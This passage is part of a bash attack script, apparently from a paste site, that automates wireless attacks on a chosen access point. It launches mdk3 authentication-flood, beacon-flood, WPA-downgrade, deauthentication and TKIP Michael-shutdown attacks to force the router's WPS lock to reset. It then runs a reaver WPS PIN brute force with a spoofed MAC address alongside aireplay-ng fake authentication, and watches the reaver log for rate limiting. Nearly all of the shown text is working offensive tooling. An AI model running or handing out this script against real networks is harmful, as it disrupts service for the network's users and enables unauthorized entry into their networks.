  1043. until [ $STARTAUTO == e ] || [ $STARTAUTO == E ]; do
  1044.  
  1045.  
  1046.     Eterm -g 80x10-1-500 --cmod "red" -T "Airodump-ng" -e sh  -c "airodump-ng -c $CHANNEL --bssid $TARGETAP $MON; bash" &
  1047.  
  1048. sleep 2
  1049.  
  1050.     Eterm -g 80x10+1-210 --cmod "red" -T "Authentication DoS Mode" -e sh  -c "mdk3 $MON a -a $TARGETAP -m; bash" &
  1051.  
  1052. sleep 2
  1053.  
  1054.     if [ $BFM == y ] || [ $BFM == Y ]; then
  1055.  
  1056.     Eterm -g 80x10+1-70 --cmod "red" -T "Beacon Flood Mode" -e sh -c "mdk3 $MON b -a $TARGETAP -h -c $CHANNEL -s 50; bash" &
  1057.  
  1058.         fi
  1059. sleep 2
  1060.  
  1061.     if [ $WPAD == y ] || [ $WPAD == Y ] && [ $BFM == y ] || [ $BFM == Y ]; then
  1062.  
  1063.     Eterm -g 80x10-1-350 --cmod "red" -T "WPA Downgrade Mode" -e sh  -c "mdk3 $MON g -t $TARGETAP; bash" &
  1064.  
  1065.         fi
  1066.  
  1067. sleep 2
  1068.     if [ $WPAD == y ] || [ $WPAD == Y ] && [ $BFM == n ] || [ $BFM == N ]; then
  1069.  
  1070.     Eterm -g 80x10+1-70 --cmod "red" -T "WPA Downgrade Mode" -e sh  -c "mdk3 $MON g -t $TARGETAP; bash" &
  1071.  
  1072.         fi
  1073.  
  1074. sleep 2
  1075.  
  1076.  
  1077.     Eterm -g 80x10-1-210 --cmod "red" -T "Deauth/Disass Amok Mode" -e sh  -c "mdk3 $MON d -b blacklist -c $CHANNEL -s 250; bash" &
  1078.  
  1079. sleep 2
  1080.  
  1081.     if [ $JTKIP == y ] || [ $JTKIP == Y ]; then
  1082.  
  1083. # Without -j command
  1084.     Eterm -g 80x10-1-70 --cmod "red" -T "Michael Shutdown Exploitation w/ -j" -e sh  -c "mdk3 $MON m -t $TARGETAP -j; bash" &
  1085.  
  1086.         fi
  1087.  
  1088.  
  1089.  
  1090.     if [ $JTKIP == n ] || [ $JTKIP == N ]; then
  1091.  
  1092.     Eterm -g 80x10-1-70 --cmod "red" -T "Michael Shutdown Exploitation" -e sh  -c "mdk3 $MON m -t $TARGETAP; bash" &
  1093.  
  1094.         fi
  1095.  
  1096. #FN=1 #starts file outside loop
  1097. PAD=`printf "%05d\n" $FN`
  1098.  
  1099.  
  1100.  
  1101.  
  1102.  
  1103. ################reaver start#######################
  1104. sleep $LIVE
  1105.  
  1106.     killall -q mdk3 &> /dev/null
  1107.     sleep .2
  1108.     killall -q airodump-ng &> /dev/null
  1109.     sleep .2
  1110.     killall -q Eterm &> /dev/null
  1111.  
  1112.  
  1113.  
  1114.  
  1115.     if [ $RCHOICE == n ]; then
  1116.  
  1117.         Eterm -g 80x10-1-70 --cmod "red" -T "reaver" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 -d 15 -T .5 --out-file=reaverlogfile-$PAD --mac=$VARMAC; bash" &
  1118.  
  1119.         fi
  1120.  
  1121.     if [ $RCHOICE == y ]; then
  1122.  
  1123.         Eterm -g 80x10-1-70 --cmod "red" -T "reaver -r $RX:$RY" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 -d 15 -T .5 --out-file=reaverlogfile-$PAD  -r $RX:$RY --mac=$VARMAC; bash" &
  1124.  
  1125.         fi
  1126.  
  1127.  
  1128.         Eterm -g 80x10+1-70 --cmod "red" -T "Airodump-ng" -e sh  -c "airodump-ng -c $CHANNEL --bssid $TARGETAP $MON; bash" &
  1129.         echo ""
  1130.  
  1131.  
  1132.         Eterm -g 80x10-1-300 --cmod "red" -T "Aireplay-ng" -e sh  -c "aireplay-ng -1 120 -a $TARGETAP $MON; bash" &
  1133.  
  1134.  
  1135. echo "made it this far"
  1136. sleep 10
  1137.  
  1138.  
  1139. let FN=FN+1
  1140.  
  1141. tail -f reaverlogfile-$PAD | while read LOGLINE
  1142.  
  1143. do
  1144.  
  1145.     [[ "${LOGLINE}" == "[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking" ]] && pkill -P $$ tail
  1146.  
  1147.  
  1148.     done #tail -f reaverlogfile-$PAD | while read LOGLINE
  1149.  
  1150.  
  1151.  
  1152.         done
  1153.  
  1154.     killall -q reaver &> /dev/null
  1155.     sleep .2
  1156.     killall -q airodump-ng &> /dev/null
  1157.     sleep .2
  1158.     killall -q aireplay-ng &> /dev/null
  1159.     sleep .2
  1160.     killall -q Eterm &> /dev/null
  1161.  
  1162. sleep 5
  1163.  
  1164.  
  1165.  
  1166.  
  1167.  
  1168.  
  1169.       fi # loop1 (if [ $AUTOMAN == a ] || [ $AUTOMAN == A ]; than)
  1170.  
  1171.  
  1172.  
  1173.  
  1174. #until [ $STARTAUTO == e ] || [ $STARTAUTO == E ]; do
  1175.  
  1176.  
  1177.  
  1178.  
  1179. ########################MANUAL######################################
  1180.  
  1181.    if [ $AUTOMAN == m ] || [ $AUTOMAN == M ]; then
  1182.  
  1183. clear
  1184. echo ""
  1185. echo -e "$inp        !!!!!STARTING AIRODUMP-NG MDK3 ETERM WINDOWS!!!!!$txtrst"
  1186. sleep 1
  1187.  
  1188.  
  1189.  
  1190. STARTR=ZZZ
  1191. until [ $STARTR == e ] || [ $STARTR == E ]; do
  1192.  
  1193.     Eterm -g 80x10-1-500 --cmod "red" -T "Airodump-ng" -e sh  -c "airodump-ng -c $CHANNEL --bssid $TARGETAP $MON; bash" &
  1194.  
  1195. sleep 2
  1196.  
  1197.     Eterm -g 80x10+1-210 --cmod "red" -T "Authentication DoS Mode" -e sh  -c "mdk3 $MON a -a $TARGETAP -m; bash" &
  1198.  
  1199. sleep 2
  1200.  
  1201.     if [ $BFM == y ] || [ $BFM == Y ]; then
  1202.  
  1203.     Eterm -g 80x10+1-70 --cmod "red" -T "Beacon Flood Mode" -e sh -c "mdk3 $MON b -a $TARGETAP -h -c $CHANNEL -s 50; bash" &
  1204.  
  1205.         fi
  1206. sleep 2
  1207.  
  1208.     if [ $WPAD == y ] || [ $WPAD == Y ] && [ $BFM == y ] || [ $BFM == Y ]; then
  1209.  
  1210.     Eterm -g 80x10-1-350 --cmod "red" -T "WPA Downgrade Mode" -e sh  -c "mdk3 $MON g -t $TARGETAP; bash" &
  1211.  
  1212.         fi
  1213.  
  1214. sleep 2
  1215.     if [ $WPAD == y ] || [ $WPAD == Y ] && [ $BFM == n ] || [ $BFM == N ]; then
  1216.  
  1217.     Eterm -g 80x10+1-70 --cmod "red" -T "WPA Downgrade Mode" -e sh  -c "mdk3 $MON g -t $TARGETAP; bash" &
  1218.  
  1219.         fi
  1220.  
  1221. sleep 2
  1222.  
  1223.  
  1224.     Eterm -g 80x10-1-210 --cmod "red" -T "Deauth/Disass Amok Mode" -e sh  -c "mdk3 $MON d -b blacklist -c $CHANNEL -s 250; bash" &
  1225.  
  1226. sleep 2
  1227.  
  1228.     if [ $JTKIP == y ] || [ $JTKIP == Y ]; then
  1229.  
  1230. # Without -j command
  1231.     Eterm -g 80x10-1-70 --cmod "red" -T "Michael Shutdown Exploitation w/ -j" -e sh  -c "mdk3 $MON m -t $TARGETAP -j; bash" &
  1232.  
  1233.         fi
  1234.  
  1235.  
  1236.     if [ $JTKIP == n ] || [ $JTKIP == N ]; then
  1237.  
  1238.     Eterm -g 80x10-1-70 --cmod "red" -T "Michael Shutdown Exploitation" -e sh  -c "mdk3 $MON m -t $TARGETAP; bash" &
  1239.  
  1240.         fi
  1241.  
  1242.  
  1243. clear
  1244. while true
  1245. do
  1246. echo ""
  1247. echo -e "$inp  Enter $yel(r/R)$inp if you think the router has reset and want to start Reaver."
  1248. echo -e "$inp     Enter $yel(e/E)$inp to skip reaver for another attempt to reset the router"
  1249. echo -e "       or continue for program shutdown.$txtrst."
  1250.  
  1251.     read STARTR
  1252.     case $STARTR in
  1253.     r|R|e|E) break ;;
  1254.     ~|~~)
  1255.     echo Aborting -
  1256.     exit
  1257.     ;;
  1258.  
  1259.     esac
  1260.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  1261.  
  1262.         done
  1263.  
  1264.  
  1265.  
  1266.     if [ $STARTR == r ] || [ $STARTR == R ]; then
  1267.         killall -q Eterm &> /dev/null
  1268.                 sleep .2
  1269.         killall -q mdk3 &> /dev/null
  1270.                 sleep .2
  1271.         killall -q airodump-ng &> /dev/null
  1272.                 sleep .2
  1273.  
  1274.     if [ $RCHOICE == n ]; then
  1275.  
  1276.         Eterm -g 80x10-1-70 --cmod "red" -T "reaver" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 -d 15 -T .5 --mac=$VARMAC; bash" &
  1277.  
  1278.         fi
  1279.  
  1280.     if [ $RCHOICE == y ]; then
  1281.  
  1282.         Eterm -g 80x10-1-70 --cmod "red" -T "reaver -r $RX:$RY" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 -d 15 -T .5 -r $RX:$RY --mac=$VARMAC; bash" &
  1283.  
  1284.         fi
  1285.  
  1286.  
  1287. #       Eterm -g 80x10-1-70 --cmod "red" -T "reaver" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 --mac=$VARMAC; bash" &
  1288.         echo""
  1289.         sleep 1
  1290.  
  1291.         Eterm -g 80x10+1-70 --cmod "red" -T "Airodump-ng" -e sh  -c "airodump-ng -c $CHANNEL --bssid $TARGETAP $MON; bash" &
  1292.         echo ""
  1293.  
  1294.         Eterm -g 80x10-1-300 --cmod "red" -T "Aireplay-ng" -e sh  -c "aireplay-ng -1 120 -a $TARGETAP $MON; bash" &
  1295.         echo ""
  1296.  
  1297.     clear
  1298.     while true
  1299.     do
  1300.                 echo -e "$info  If reaver doesnot associate to the AP and/or the target AP is not seen"
  1301.         echo -e "     in airodump-ng, target AP MAY have changed channels!!!"
  1302.                 echo -e "$inp       type $yel(r/R)$inp to rescan with airodump-ng or"
  1303.                 echo -e "         type $yel(c/C)$inp to skip and continue.... $txtrst"
  1304.  
  1305.         read RESCAN
  1306.         case $RESCAN in
  1307.         r|R|c|C) break ;;
  1308.         ~|~~)
  1309.         echo Aborting -
  1310.         exit
  1311.         ;;
  1312.  
  1313.         esac
  1314.         echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  1315.  
  1316.             done
  1317.  
  1318.  
  1319.  
  1320.  
  1321.  
  1322.         if [ $RESCAN == r ] || [ $RESCAN == R ]; then
  1323.             killall -q reaver &> /dev/null
  1324.             sleep .2
  1325.             killall -q airodump-ng &> /dev/null
  1326.             sleep .2
  1327.             killall -q aireplay-ng &> /dev/null
  1328.             sleep .2
  1329.             killall -q Eterm &> /dev/null
  1330.             Eterm -g 80x50-1-70 --cmod "red" -T "Airodump-ng" -e sh  -c "airodump-ng $MON; bash" &
  1331.  
  1332.     clear
  1333.     while true
  1334.     do
  1335.     echo ""
  1336.             echo -e "$q  If you wish to restart reaver type $yel(r/R)$q,or type $yel(c/C)$q to skip.$txtrst"
  1337.  
  1338.     read RESREV
  1339.     case $RESREV in
  1340.     r|R|c|C) break ;;
  1341.     ~|~~)
  1342.     echo Aborting -
  1343.     exit
  1344.     ;;
  1345.  
  1346.     esac
  1347.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  1348.  
  1349.         done
  1350.  
  1351.  
  1352. clear
  1353.  
  1354.            
  1355.                 if [ $RESREV == r ] || [ $RESREV == R ]; then
  1356.  
  1357.                 while true
  1358.                 do
  1359.                 echo -e "$inp  Enter Channel of Target AP.$txtrst"
  1360.  
  1361.                 read CHANNEL
  1362.                 case $CHANNEL in
  1363.                     1|2|3|4|5|6|7|8|9|10|11|12|13|14) break ;;
  1364.                     ~|~~)
  1365.                     echo Aborting -
  1366.                     exit
  1367.                     ;;
  1368.  
  1369.                 esac
  1370.                 echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  1371.  
  1372.                     done
  1373.  
  1374. sleep 2
  1375.  
  1376.                 killall -q airodump-ng &> /dev/null
  1377.  
  1378.                 #Eterm -g 80x10-1-70 --cmod "red" -T "reaver" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 --mac=$VARMAC; bash" &
  1379.  
  1380. sleep 1
  1381.  
  1382.     if [ $RCHOICE == n ]; then
  1383.  
  1384.         Eterm -g 80x10-1-70 --cmod "red" -T "reaver" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 -d 15 -T .5 --mac=$VARMAC; bash" &
  1385.  
  1386.         fi
  1387.  
  1388.     if [ $RCHOICE == y ]; then
  1389.  
  1390.         Eterm -g 80x10-1-70 --cmod "red" -T "reaver -r $RX:$RY" -e sh  -c "reaver -i $MON -a -f -c $CHANNEL -b $TARGETAP -vv -x 60 -d 15 -T .5 -r $RX:$RY --mac=$VARMAC; bash" &
  1391.  
  1392.         fi
  1393.  
  1394.  
  1395.         Eterm -g 80x10+1-70 --cmod "red" -T "Airodump-ng" -e sh  -c "airodump-ng -c $CHANNEL --bssid $TARGETAP $MON; bash" &
  1396.         echo ""
  1397.  
  1398.  
  1399.         Eterm -g 80x10-1-300 --cmod "red" -T "Aireplay-ng" -e sh  -c "aireplay-ng -1 120 -a $TARGETAP $MON; bash" &
  1400.                
  1401.         fi
  1402.  
  1403.             fi
  1404.  
  1405.                 fi
  1406.  
  1407. clear
  1408. while true
  1409. do
  1410. echo ""
  1411. echo -e "$inp If WPS locking exists, type $yel(c/C)$inp to reset router or type $yel(e/E)$inp to end program.$txtrst"
  1412.  
  1413.     read STARTR
  1414.     case $STARTR in
  1415.     c|C|e|E) break ;;
  1416.     ~|~~)
  1417.     echo Aborting -
  1418.     exit
  1419.     ;;
  1420.  
  1421.     esac
  1422.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  1423.  
  1424.         done
  1425.  
  1426.  
  1427.     if [ $STARTR == c ] || [ $STARTR == C ]; then
  1428.  
  1429.  
  1430.         clear
  1431.         while true
  1432.         do
  1433.         echo ""
  1434.  
  1435.         echo -e $q  "Do you wish to add or continue using Beacon Flood Mode?"
  1436.         echo -e $inp     "Type $yel(y/Y)$inp for yes or $yel(n/N)$inp for no.$txtrst" #(BFM)
  1437.         read BFM
  1438.         case $BFM in
  1439.         y|Y|n|N) break ;;
  1440.         ~|~~)
  1441.         echo Aborting -
  1442.         exit
  1443.         ;;
  1444.  
  1445.         esac
  1446.         echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  1447.  
  1448.             done
  1449.  
  1450.  
  1451.         fi     
  1452.  
  1453. killall -q reaver &> /dev/null
  1454. sleep .2
  1455. killall -q airodump-ng &> /dev/null
  1456. sleep .2
  1457. killall -q aireplay-ng &> /dev/null
  1458. sleep .2
  1459. killall -q mdk3 &> /dev/null
  1460. sleep .2
  1461. killall -q Eterm &> /dev/null
  1462.  
  1463.  
  1464.     done
  1465.  
  1466.  
  1467.         fi #if [ $AUTOMAN == m ] || [ $AUTOMAN == M ]; than
  1468.  
  1469.  
  1470. clear
  1471. sleep 3
  1472. while true
  1473.  
  1474. do
  1475. echo ""
  1476. echo ""
  1477. echo ""
  1478. echo -e "$warn  ####################################################"
  1479. echo -e "$warn  #$inp Press y to remove Eterm pages and clear program! #"
  1480. echo -e "$warn  ####################################################$txtrst"
  1481. echo ""
  1482. echo ""
  1483.  
  1484.   read CONFIRM
  1485.   case $CONFIRM in
  1486.     y|Y|YES|yes|Yes) break ;;
  1487.     #n|N|no|NO|No)
  1488.     #echo Aborting - you entered $CONFIRM
  1489.     #exit
  1490.     #  ;;
  1491.  
  1492.     esac
  1493.  
  1494.         done
  1495.  
  1496. killall -q Eterm &> /dev/null
  1497. killall -q mdk3 &> /dev/null
  1498. killall -q airodump-ng &> /dev/null
  1499. killall -q aireplay-ng &> /dev/null
  1500. killall -q reaver &> /dev/null
  1501.  
  1502. echo -e "$info  This was a A Musket Team - Soxrox2212 Collaboration."
  1503. echo -e "$info     Bring into view that which is hidden ."
  1504. echo -e "$info       Ending Program.$warn.$txtrst.$warn.$txtrst.$warn.$txtrst.$info.....$txtrst"
  1505.  
  1506. sleep 7
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement